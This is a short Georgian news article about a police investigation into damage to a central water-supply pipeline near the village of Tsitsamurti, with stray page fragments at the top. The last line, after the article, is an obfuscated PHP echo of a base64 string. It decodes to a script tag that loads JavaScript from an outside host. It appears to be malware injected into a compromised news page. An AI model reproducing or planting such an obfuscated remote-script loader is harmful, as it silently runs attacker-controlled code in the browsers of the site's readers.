celsiusi
ავერსი შნაიდერი

 სოფელ წიწამურთან „ჯივიპის“ კუთვნილი ცენტრალური მაგისტრალური მილსადენის დაზიანების ფაქტზე გამოძიება დაიწყო. ამის შესახებ ინფორმაცია პირველ არხს შინაგან საქმეთა სამინისტროში დაუდასტურეს.

როგორც უწყებაში განმარტეს, გამოძიება სისხლის სამართლის კოდექსის 188-ე და 306-ე მუხლებით მიმდინარეობს, რაც გაუფრთხილებლობით ნივთის დაზიანებას ან განადგურებას და უკანონო ქმედებით გარემოსთვის მნიშვნელოვანი ზიანის მიყენებას გულისხმობს.

სოფელ წიწამურის მიმდებარედ წყალმომარაგების ცენტრალური მაგისტრალური მილსადენი რამდენიმე დღის წინ ავარიულად დაზიანდა. როგორც „ჯორჯიან ვოთერ ენდ ფაუერში“ განმარტავენ, „ჯივიპისგან“ დამოუკიდებლად, მესამე პირების მიერ დროთა განმავლობაში ხდებოდა აღნიშნული ტერიტორიის ნაყარი მასალით შევსება, რამაც წარმოქმნა დიდი ზომის გეოლოგიურად არასტაბილური მიწის ფერდობი. ადგილზე სამუშაოები რამდენიმე დღეა, მიმდინარეობს.

132
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");